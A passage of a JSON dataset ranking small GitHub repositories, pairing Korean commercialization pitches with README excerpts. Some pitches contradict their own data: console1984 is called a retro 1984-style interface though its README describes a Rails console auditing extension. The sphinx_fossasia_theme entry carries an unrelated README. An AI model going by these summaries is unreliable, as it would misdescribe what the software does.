CallStu","composite_score":0.0027,"license_safety_tag":"safe"},{"name":"c3rb3ru5d3d53c/binlex","github_url":"https://github.com/c3rb3ru5d3d53c/binlex","stars":7,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# binlex 저장소 분석\n\n## 왜 보물인가\n컴퓨터 프로그램의 내부 구조를 자동으로 분석하고 시각화해주는 도구로, 보안 전문가나 소프트웨어 개발자들이 악성 코드를 탐지하거나 프로그램을 깊이 이해할 때 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 소프트웨어 보안을 자동으로 검사해주는 웹 기반 검사 플랫폼\n- **내부 업","readme_excerpt":"![build](https://github.com/c3rb3ru5d3d53c/binlex/actions/workflows/cicd.yml/badge.svg?branch=master)\n![OS Linux](https://img.shields.io/badge/os-linux-brightgreen)\n![OS Windows](https://img.shields.io/badge/os-windows-brightgreen)\n![OS MacOS](https://img.shields.io/badge/os-macos-brightgreen)\n[![GitHub stars](https://img.shields.io/github/stars/c3rb3ru5d3d53c/binlex)](https://github.com/c3rb3ru5d3d53c/binlex/stargazers)\n[![GitHub license](https://img.shields.io/github/license/c3rb3ru5d3d53c/binlex)](https://github.com/c3rb3ru5d3d53c/binlex/blob/master/LICENSE)\n![GitHub all releases](https://img.shields.io/github/downloads/c3rb3ru5d3d53c/binlex/total)\n![binlex-python](https://img.shields.io/docker/pulls/c3rb3ru5d3d53c/binlex-python?logo=docker&label=binlex-python)\n![binlex-server](https://img.shields.io/docker/pulls/c3rb3ru5d3d53c/binlex-server?logo=docker&label=binlex-server)\n![binlex-web](https://img.shields.io/docker/pulls/c3rb3ru5d3d53c/binlex-web?logo=docker&label=binlex-web)\n![bi","composite_score":0.0025,"license_safety_tag":"safe"},{"name":"basecamp/console1984","github_url":"https://github.com/basecamp/console1984","stars":7,"language":"Ruby","license":"MIT","abandonment_months":0,"description":"# basecamp/console1984 분석\n\n## 왜 보물인가\n1984년식 컴퓨터 인터페이스를 현대적으로 재현한 프로젝트로, 레트로 감성과 기술을 결합한 독특한 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 개발자 입문자를 위한 프로그래밍 학습 플랫폼에 레트로 테마 UI 제공\n2. **창작 도구**: 영상/게임 제작자들이 복","readme_excerpt":"![example workflow](https://github.com/basecamp/console1984/actions/workflows/build.yml/badge.svg)\n\n# Console1984\n\nA Rails console extension that protects sensitive accesses and makes them auditable.\n\n> “If you want to keep a secret, you must also hide it from yourself.”\n>\n> ― George Orwell, 1984\n\nIf you are looking for the auditing tool, check [`audits1984`](https://github.com/basecamp/audits1984).\n\n![Terminal screenshot showing console1984 asking for a reason for the session](docs/images/console-session-reason.png)\n\n## Installation\n\n**Important:** `console1984` depends on [Active Record encryption](https://guides.rubyonrails.org/active_record_encryption.html) which is a Rails 7 feature.\n\nAdd it to your `Gemfile`:\n\n```ruby\ngem 'console1984'\n```\n\nCreate tables to store console activity in the database:\n\n```ruby\nrails console1984:install:migrations\nrails db:migrate\n```\n\nBy default, console1984 is only enabled in `production`. You can configure the target environments in your `applicatio","composite_score":0.0025,"license_safety_tag":"safe"},{"name":"trunk-io/trunk-action","github_url":"https://github.com/trunk-io/trunk-action","stars":5,"language":"Shell","license":"MIT","abandonment_months":0,"description":"# trunk-io/trunk-action 분석 보고서\n\n## 왜 보물인가\n소프트웨어 개발 과정에서 코드 품질을 자동으로 점검하고 개선해주는 도구로, 개발팀의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: GitHub/GitLab 등 개발 플랫폼과 연동하여 코드 리뷰 자동화 서비스 제공\n2. **내부 업무 도구","readme_excerpt":"<!-- markdownlint-disable first-line-heading -->\n\n[![Trunk.io](https://github.com/user-attachments/assets/c98a90ee-439b-4a9c-bb9a-69dc0e7e2c7e)](https://trunk.io)\n\n[![docs](https://img.shields.io/badge/-docs-darkgreen?logo=readthedocs&logoColor=ffffff)][docs]\n[![vscode](https://img.shields.io/visual-studio-marketplace/i/trunk.io?color=0078d7&label=vscode&logo=visualstudiocode)][vscode]\n[![slack](https://img.shields.io/badge/-slack-611f69?logo=slack)][slack]\n[![openssf](https://api.securityscorecards.dev/projects/github.com/trunk-io/trunk-action/badge)](https://api.securityscorecards.dev/projects/github.com/trunk-io/trunk-action)\n\n> **💡Tip**\n>\n> 🎉 New: [Trunk Flaky Tests](https://trunk.io/flaky-tests) detects, quarantines, and eliminates\n> flaky tests.\n\n# Trunk.io GitHub Action\n\n> **Note**\n>\n> We strongly encourage using Trunk Code Quality's integration with GitHub to run Trunk Code Quality\n> on CI.\n> [Get started here!](https://docs.trunk.io/code-quality/setup-and-installation/prevent-","composite_score":0.0024,"license_safety_tag":"safe"},{"name":"llaville/php-compat-info","github_url":"https://github.com/llaville/php-compat-info","stars":21,"language":"PHP","license":"NOASSERTION","abandonment_months":0,"description":"# php-compat-info 상용화 분석\n\n## 왜 보물인가\nPHP 프로그램이 다양한 버전의 서버 환경에서 제대로 작동하는지 자동으로 검사해주는 도구로, 웹 개발사들의 호환성 문제 해결 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 호스팅 회사의 진단 서비스**: 고객이 업로드한 웹사이트 코드를 분석해 \"어느 서버 버전까지 ","readme_excerpt":"<!-- markdownlint-disable MD013 -->\n# PHP CompatInfo\n\n[![StandWithUkraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/badges/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/blob/main/docs/README.md)\n[![GitHub Discussions](https://img.shields.io/github/discussions/llaville/php-compatinfo)](https://github.com/llaville/php-compatinfo/discussions)\n\n**PHP CompatInfo** is a library that can find the minimum version and the extensions required for a piece of code to run.\n\nRunning on PHP greater or equal than 7.4 for parsing source code in a format PHP 5.2 to PHP 8.5\n\n## Versions\n\n| Releases      |                   Branch                    |                              PHP                              |                         Packagist                         |                    License                     |                          Documentation                           |\n|:--------------|:-------------------------------------------:|:----","composite_score":0.0024,"license_safety_tag":"unknown"},{"name":"Banuba/ve-sdk-android-integration-sample","github_url":"https://github.com/Banuba/ve-sdk-android-integration-sample","stars":8,"language":"Kotlin","license":"unknown","abandonment_months":0,"description":"# Banuba/ve-sdk-android-integration-sample 분석\n\n## 왜 보물인가\n스마트폰에서 실시간으로 얼굴을 인식하고 영상 효과를 더할 수 있는 핵심 기술로, 소셜 미디어나 라이브 방송 앱에 필수적인 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **라이브 방송 플랫폼**: 유튜브 라이브, 트위치 같은 서비스에 뷰티 필터와 특수효과 제","readme_excerpt":"\n[![](https://www.banuba.com/hubfs/Banuba_November2018/Images/Banuba%20SDK.png)](https://www.banuba.com/video-editor-sdk)\n# Banuba Video Editor & Photo Editor SDKs - Android integration sample\n<p align=\"center\">\n<img src=\"mddocs/gif/camera_preview.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mddocs/gif/camera_pip.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mddocs/gif/audio_browser.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mddocs/gif/background_separation.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n</p>\n<p align=\"center\">\n<img src=\"mddocs/gif/PE_UI_retouch.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mddocs/gif/PE_UI_make.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mddocs/gif/PE_UI_overlays.gif\" alt=\"Screenshot\" width=\"19%\" h","composite_score":0.0022,"license_safety_tag":"unknown"},{"name":"sebastianbergmann/php-file-iterator","github_url":"https://github.com/sebastianbergmann/php-file-iterator","stars":9,"language":"PHP","license":"bsd-3-clause","abandonment_months":0,"description":"# php-file-iterator 상업화 분석\n\n## 왜 보물인가\n웹사이트나 앱 개발에 필요한 파일들을 자동으로 찾아서 정렬해주는 작은 도구로, 개발자들의 반복적인 작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코드 품질 검사 플랫폼에서 대량의 프로젝트 파일을 빠르게 스캔하는 데 활용\n2. **내부 업무 도구*","readme_excerpt":"[![Latest Stable Version](https://poser.pugx.org/phpunit/php-file-iterator/v)](https://packagist.org/packages/phpunit/php-file-iterator)\n[![CI Status](https://github.com/sebastianbergmann/php-file-iterator/workflows/CI/badge.svg)](https://github.com/sebastianbergmann/php-file-iterator/actions)\n[![Type Coverage](https://shepherd.dev/github/sebastianbergmann/php-file-iterator/coverage.svg)](https://shepherd.dev/github/sebastianbergmann/php-file-iterator)\n[![codecov](https://codecov.io/gh/sebastianbergmann/php-file-iterator/branch/main/graph/badge.svg)](https://codecov.io/gh/sebastianbergmann/php-file-iterator)\n\n# php-file-iterator\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n    composer require phpunit/php-file-iterator\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n    composer require ","composite_score":0.0021,"license_safety_tag":"safe"},{"name":"Rythe-Interactive/Legion-Engine","github_url":"https://github.com/Rythe-Interactive/Legion-Engine","stars":6,"language":"C++","license":"MIT","abandonment_months":0,"description":"# Legion Engine 평가 보고서\n\n## 왜 보물인가\n게임이나 3D 콘텐츠를 직접 만들 수 있는 기초 엔진으로, 개발자들이 처음부터 모든 것을 만들 필요 없이 기반 시스템을 재사용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들을 위한 월구독 기반 클라우드 게임 제작 플랫폼\n2. **기업 교육용 ","readme_excerpt":"[![rythe logo banner](https://assets.zyrosite.com/dWxb3NO0jWugObXN/logo_for_dark_bg-A3QwL7kkxvfw1ywO.png)](http://rythe-interactive.com)\n[![build](https://github.com/Legion-Engine/Legion-Engine/workflows/build-action/badge.svg)](https://github.com/Legion-Engine/Legion-Engine/actions?query=workflow%3Abuild-action)\n[![analyze](https://github.com/Legion-Engine/Legion-Engine/workflows/analyze-action/badge.svg)](https://github.com/Legion-Engine/Legion-Engine/actions?query=workflow%3Aanalyze-action)\n[![docs](https://github.com/Legion-Engine/Legion-Engine/workflows/docs-action/badge.svg)](https://docs.legion-engine.com)\n[![License-MIT](https://img.shields.io/github/license/Legion-Engine/Legion-Engine)](https://github.com/Legion-Engine/Legion-Engine/blob/main/LICENSE)\n[![Discord](https://img.shields.io/discord/682321168610623707.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/unVNRbd)\n# Rythe-Engine\nRythe-Engine is a data oriented C++17 OpenGL game ","composite_score":0.002,"license_safety_tag":"safe"},{"name":"fossasia/sphinx_fossasia_theme","github_url":"https://github.com/fossasia/sphinx_fossasia_theme","stars":12,"language":"Shell","license":"unknown","abandonment_months":0,"description":"# fossasia/sphinx_fossasia_theme 평가\n\n## 왜 보물인가\n기술 문서를 전문적으로 보여주는 디자인 틀을 제공하여, 복잡한 프로젝트도 깔끔하게 설명할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 문서화 서비스**: 스타트업들이 자신의 제품 설명서를 이 테마로 만들어 판매\n2. **기술 교육 플랫폼**: 코딩 학원이","readme_excerpt":"eventyay-plugin-cookiecutter\n==========================\n\nA simple `cookiecutter`_ template to bootstrap a `eventyay`_ plugin.\n\nUsage\n-----\n\nLet's pretend you want to create a eventyay plugin called \"superplugin\".\nFirst, create a virtual environment and install the ``cookiecutter``\npackage using pip. Next, use it to bootstrap your project folder::\n\n    $ cd <your-project-folder-parent>\n    $ cookiecutter https://github.com/fossasia/eventyay-plugin-cookiecutter\n\n\nYou'll be prompted for some questions. Answer them, and you will find a\nproject folder created for you::\n\n    repo_name [eventyay-superplugin]: eventyay-superplugin\n    repo_url [GitHub repository URL]: https://github.com/myuser/eventyay-superplugin\n    module_name [eventyay_superplugin]: eventyay_superplugin\n    human_name [The eventyay super plugin]: Super Plugin\n    author_name [Your name]: J Random Developer\n    author_email [Your email]: jrandom@example.org\n    short_description [Short description]: The best plugin\n    min_","composite_score":0.0019,"license_safety_tag":"unknown"},{"name":"rentruewang/learning-machine","github_url":"https://github.com/rentruewang/learning-machine","stars":5,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":0,"description":"# rentruewang/learning-machine 상용화 분석\n\n## 왜 보물인가\n머신러닝(컴퓨터가 스스로 학습하는 기술)을 쉽게 배우고 실제로 적용할 수 있는 교육용 자료 모음으로, 인공지능 시대에 필요한 기술을 대중화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 SaaS 서비스**\n- 회사원이나 학생을 위한 월간 구독형 머신러","readme_excerpt":"### 🫙 Archive\n\n> This was created at a time when I was TA for machine learning, aggregating students' questions and made them into a book. I don't see an update in the near future.\n\n> Nowadays I'm mainly working on [`aioway`](https://github.com/rentruewang/aioway), a deep learning algorithm compiler! Check it out.\n\n# ![Favicon](./book/images/favicon.ico) Learning Machine\n\n**[Straight forward machine learning based on answers and intuition for machine learners](https://rentruewang.github.io/learning-machine/)**\n\n📚 **This handbook accompanies the course: [Machine Learning with Hung-Yi Lee](https://speech.ee.ntu.edu.tw/~hylee/ml/2021-spring.html)**\n\n![Logo](./book/images/logo.png)\n\n🤓 _**Whoever fights monsters should see to it that in the process he does not become a monster. And if you gaze long enough into an abyss, the abyss will gaze back into you. And in order to tame machine learning, one must first know how to learn machine.**_\n--- Me, 2021\n\n## ✍️ Where does the logo come from?\n\nTh","composite_score":0.0019,"license_safety_tag":"safe"},{"name":"microsoft/foss-fund","github_url":"https://github.com/microsoft/foss-fund","stars":6,"language":"","license":"MIT","abandonment_months":0,"description":"# Microsoft FOSS Fund 상용화 분석\n\n## 왜 보물인가\n마이크로소프트가 공개 소프트웨어 프로젝트에 자금을 지원하는 이 프로젝트는 신뢰할 수 있는 기술 파트너와의 협력 기회를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 기금 관리 SaaS**: 회사들이 오픈소스 프로젝트에 투자하는 과정을 자동화하고 추적하는 웹 서비스\n2. **내부 ","readme_excerpt":"# Microsoft's Free and Open Source Software Fund (FOSS Fund)\n![fossfund-colors](assets/foss-fund.png)\n\nThe Microsoft FOSS Fund provides a direct way for Microsoft engineers to participate in the nomination and selection process to\nhelp communities and projects they are passionate about.\n\nA project of the [Microsoft Open Source Programs Office](https://opensource.microsoft.com), the FOSS Fund grants sponsorships\nto open source projects as selected by Microsoft employees. To help drive an open contribution culture across Microsoft,\nemployees are eligible to select projects for the fund when they participate in projects that are not governed by Microsoft.\nA data-driven approach has also been used for bulk sponsorship experiments.\n\n## About the FOSS Fund :seedling:\n\nMicrosoft is proud to be participating in open source communities more than ever before, whether contributing to\nprojects, releasing new open source projects, or using open source to make our products and services work better f","composite_score":0.0017,"license_safety_tag":"safe"},{"name":"Banuba/ve-sdk-ios-integration-sample","github_url":"https://github.com/Banuba/ve-sdk-ios-integration-sample","stars":5,"language":"Swift","license":"unknown","abandonment_months":0,"description":"# Banuba/ve-sdk-ios-integration-sample 분석\n\n## 왜 보물인가\n스마트폰 카메라로 실시간 영상 효과(필터, 뷰티 보정 등)를 쉽게 만들 수 있는 기술이라 동영상·라이브 방송 앱 개발사들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 영상 효과 SaaS 플랫폼**\n- 개인 크리에이터가 구독으로 다양한 필터와 ","readme_excerpt":"[![](https://www.banuba.com/hubfs/Banuba_November2018/Images/Banuba%20SDK.png)](https://www.banuba.com/video-editor-sdk)\n# Banuba Video & Photo Editor SDKs - iOS integration sample\n<p align=\"center\">\n<img src=\"mdDocs/gif/camera_preview.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mdDocs/gif/pip_preview.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mdDocs/gif/audio_browser.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mdDocs/gif/gif_background.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n</p>\n<p align=\"center\">\n<img src=\"mdDocs/gif/PE_UI_retouch.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mdDocs/gif/PE_UI_make.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class=\"docs-screenshot\"/>&nbsp;\n<img src=\"mdDocs/gif/PE_UI_overlays.gif\" alt=\"Screenshot\" width=\"19%\" height=\"auto\" class","composite_score":0.0017,"license_safety_tag":"unknown"},{"name":"electron-userland/electron-packager","github_url":"https://github.com/electron-userland/electron-packager","stars":10,"language":"TypeScript","license":"bsd-2-clause","abandonment_months":0,"description":"# Electron Packager 상용화 분석\n\n## 왜 보물인가\n윈도우, 맥, 리눅스 등 여러 운영체제에서 작동하는 프로그램을 한 번에 만들어주는 도구로, 소프트웨어 개발사의 배포 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구 SaaS**: 기업들이 자신만의 데스크톱 애플리케이션을 빠르게 만들 수 있도록 웹 기반 빌","readme_excerpt":"# @electron/packager\n\nPackage your [Electron](https://electronjs.org) app into OS-specific bundles (`.app`, `.exe`, etc.) via JavaScript or the command line.\n\n[![Test](https://github.com/electron/packager/actions/workflows/test.yml/badge.svg)](https://github.com/electron/packager/actions/workflows/test.yml)\n[![electron-nightly Canary](https://github.com/electron/packager/actions/workflows/canary.yml/badge.svg)](https://github.com/electron/packager/actions/workflows/canary.yml)\n[![Coverage Status](https://codecov.io/gh/electron/packager/branch/main/graph/badge.svg)](https://codecov.io/gh/electron/packager)\n[![npm](https://img.shields.io/npm/v/@electron/packager.svg?style=flat)](https://npm.im/@electron/packager)\n[![API docs](https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fregistry.npmjs.org%2F%40electron%2Fpackager%2Flatest&query=%24.version&logo=typescript&logoColor=white&label=API%20Docs)](https://packages.electronjs.org/packager)\n[![Discord](https://img.shields.io/discord","composite_score":0.0017,"license_safety_tag":"safe"},{"name":"alex-min/ex_platform","github_url":"https://github.com/alex-min/ex_platform","stars":8,"language":"Elixir","license":"MIT","abandonment_months":0,"description":"# alex-min/ex_platform 분석\n\n## 왜 보물인가\n플랫폼 구축에 필요한 핵심 기능들을 미리 만들어둔 코드 모음으로, 새로운 서비스를 빠르게 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사들이 클라우드 기반 협업 도구나 프로젝트 관리 시스템을 빠르게 구축\n- **내부 업무 도구**: 기업들이 직원 ","readme_excerpt":"# ExPlatform, a battery-included battery Phoenix boilerplate!\n\nhttps://alex-min.fr/open-sourcing-my-phoenix-boilerplate/\n\nWhat's included out of the box:\n\n- TailwindCSS with Tailwind jit\n- Esbuild & Postcss, no webpack\n- Phoenix auth integrated with nice Tailwind pages and transformed to support i18n\n- i18n everywhere (PRs are welcomed to add more languages)\n- Notifications with a nice animation and auto-clear\n- Auth emails are using Bamboo and proper HTML template\n- Javascripts tests with Jest (and I've included some built-in tests)\n- Pre-commit checks for styling & dialyzer (this boilerplate is ready for team work)\n- Github actions checking the pre-commits and the tests for each commit\n- Dependabot\n- Asdf integration, just use the .tools-versions for all your versions! It's also what's used in the Github actions.\n- Eslint\n- Kaffy admin (on /admin)\n- [Sentry](docs/sentry.md)\n- [Deployment with Docker](docs/deployment.md)\n\nFuture integrations:\n\n- A pricing page connected to Stripe\n- A ","composite_score":0.0016,"license_safety_tag":"safe"},{"name":"miguelgrinberg/alchemical","github_url":"https://github.com/miguelgrinberg/alchemical","stars":7,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Alchemical 저장소 분석\n\n## 왜 보물인가\n데이터베이스를 쉽게 관리할 수 있는 Python 도구로, 웹 서비스나 앱 개발자들이 복잡한 데이터 작업을 간단하게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 정보 관리 시스템(CRM) 같은 웹 서비스의 데이터 저장소로 활용하여 구독 수익 모델 구축\n2. *","readme_excerpt":"# alchemical\nModern SQLAlchemy simplified.\n\n[![Build status](https://github.com/miguelgrinberg/alchemical/workflows/build/badge.svg)](https://github.com/miguelgrinberg/alchemical/actions) [![codecov](https://codecov.io/gh/miguelgrinberg/alchemical/branch/main/graph/badge.svg)](https://codecov.io/gh/miguelgrinberg/alchemical)\n\n## Resources\n\n- [Documentation](http://alchemical.readthedocs.io/en/stable/)\n- [PyPI](https://pypi.python.org/pypi/alchemical)\n- [Change Log](https://github.com/miguelgrinberg/alchemical/blob/main/CHANGES.md)\n\n","composite_score":0.0016,"license_safety_tag":"safe"},{"name":"javiereguiluz/EasyAdminBundle","github_url":"https://github.com/javiereguiluz/EasyAdminBundle","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# EasyAdminBundle 상품화 분석\n\n## 왜 보물인가\n프로그래밍 지식 없이도 웹사이트의 관리 화면을 자동으로 만들어주는 도구라 개발 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 전자상거래 플랫폼이 자체 상품 관리 화면을 빠르게 구축하여 출시 시간 단축\n2. **내부 업무 도구**:","readme_excerpt":"EasyAdmin\n=========\n\nEasyAdmin is a fast, beautiful and modern admin generator for Symfony applications.\n\n![EasyAdmin, a fast, beautiful and modern admin generator for Symfony applications](/doc/images/easyadmin-promo.jpg)\n\nInstallation\n------------\n\nEasyAdmin 4 requires PHP 8.0.2 or higher and Symfony 5.4 or higher. Run the\nfollowing command to install it in your application:\n\n```\n$ composer require easycorp/easyadmin-bundle\n```\n\nDocumentation\n-------------\n\nRead [EasyAdmin Docs][1] at the official Symfony website.\n\nVersions\n--------\n\n| Repository Branch | EasyAdmin Version | Symfony Compatibility  | PHP Compatibility | Status               | Docs\n| ----------------- | ----------------- | ---------------------- | ----------------- | -------------------- | ---\n| `master`          | `4.x`             | `5.x`, and `6.x`       | `8.0.2` or higher | New features and bug fixes | [Read Docs](https://symfony.com/bundles/EasyAdminBundle/master/index.html)\n| `3.x`             | `3.x`           ","composite_score":0.0014,"license_safety_tag":"safe"},{"name":"sebastianbergmann/php-text-template","github_url":"https://github.com/sebastianbergmann/php-text-template","stars":9,"language":"PHP","license":"bsd-3-clause","abandonment_months":0,"description":"# PHP Text Template 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 반복적인 문서 작업을 자동화할 수 있게 해주는 작은 도구로, 많은 웹서비스 뒤에서 조용히 필수 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 자동 발송 서비스**: 고객별로 다른 내용의 이메일을 대량으로 만들어 보내는 SaaS\n2. **보고서 자동 생성 도구**:","readme_excerpt":"[![Latest Stable Version](https://poser.pugx.org/phpunit/php-text-template/v)](https://packagist.org/packages/phpunit/php-text-template)\n[![CI Status](https://github.com/sebastianbergmann/php-text-template/workflows/CI/badge.svg)](https://github.com/sebastianbergmann/php-text-template/actions)\n[![codecov](https://codecov.io/gh/sebastianbergmann/php-text-template/branch/main/graph/badge.svg)](https://codecov.io/gh/sebastianbergmann/php-text-template)\n\n# php-text-template\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n    composer require phpunit/php-text-template\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n    composer require --dev phpunit/php-text-template\n\n","composite_score":0.0014,"license_safety_tag":"safe"},{"name":"chrislusf/seaweedfs","github_url":"https://github.com/chrislusf/seaweedfs","stars":10,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# SeaweedFS 상용화 분석\n\n## 왜 보물인가\n수백만 개의 파일을 빠르고 효율적으로 저장·관리할 수 있는 오픈소스 저장소 시스템으로, 대규모 데이터를 다루는 기업들이 비싼 상용 솔루션 대신 선택할 수 있는 신뢰할 만한 대안입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진 공유 앱이나 클라우드 저장소처럼 사용자들의 파일을 안전하게 ","readme_excerpt":"# SeaweedFS\n\n\n[![Slack](https://img.shields.io/badge/slack-purple)](https://join.slack.com/t/seaweedfs/shared_invite/enQtMzI4MTMwMjU2MzA3LTEyYzZmZWYzOGQ3MDJlZWMzYmI0OTE4OTJiZjJjODBmMzUxNmYwODg0YjY3MTNlMjBmZDQ1NzQ5NDJhZWI2ZmY)\n[![Twitter](https://img.shields.io/twitter/follow/seaweedfs.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=seaweedfs)\n[![Build Status](https://img.shields.io/github/actions/workflow/status/seaweedfs/seaweedfs/go.yml)](https://github.com/seaweedfs/seaweedfs/actions/workflows/go.yml)\n[![GoDoc](https://godoc.org/github.com/seaweedfs/seaweedfs/weed?status.svg)](https://godoc.org/github.com/seaweedfs/seaweedfs/weed)\n[![Wiki](https://img.shields.io/badge/docs-wiki-blue.svg)](https://github.com/seaweedfs/seaweedfs/wiki)\n[![Docker Pulls](https://img.shields.io/docker/pulls/chrislusf/seaweedfs?maxAge=4800)](https://hub.docker.com/r/chrislusf/seaweedfs/)\n[![SeaweedFS on Maven Central](https://img.shields.io/maven-central/v/com.github.chrislusf","composite_score":0.0011,"license_safety_tag":"safe"},{"name":"KSXGitHub/parallel-disk-usage","github_url":"https://github.com/KSXGitHub/parallel-disk-usage","stars":9,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# KSXGitHub/parallel-disk-usage 분석\n\n## 왜 보물인가\n컴퓨터 저장소 용량을 빠르게 분석하는 도구로, 어느 파일이 공간을 차지하고 있는지 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 최적화 SaaS**: 기업의 서버 용량 낭비를 자동으로 감지하고 정리하는 구독 서비스\n2. **IT 관리 내부 도","readme_excerpt":"# Parallel Disk Usage (pdu)\n\n[![Test](https://github.com/KSXGitHub/parallel-disk-usage/workflows/Test/badge.svg)](https://github.com/KSXGitHub/parallel-disk-usage/actions?query=workflow%3ATest)\n[![Benchmark](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/benchmark.yaml/badge.svg)](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/benchmark.yaml)\n[![Clippy](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/clippy.yaml/badge.svg)](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/clippy.yaml)\n[![Code formatting](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/fmt.yaml/badge.svg)](https://github.com/KSXGitHub/parallel-disk-usage/actions/workflows/fmt.yaml)\n[![Crates.io Version](https://img.shields.io/crates/v/parallel-disk-usage?logo=rust)](https://crates.io/crates/parallel-disk-usage)\n\nHighly parallelized, blazing fast directory tree analyzer.\n\n## Description\n\n`pdu` is a CLI program that renders a g","composite_score":0.001,"license_safety_tag":"safe"}]}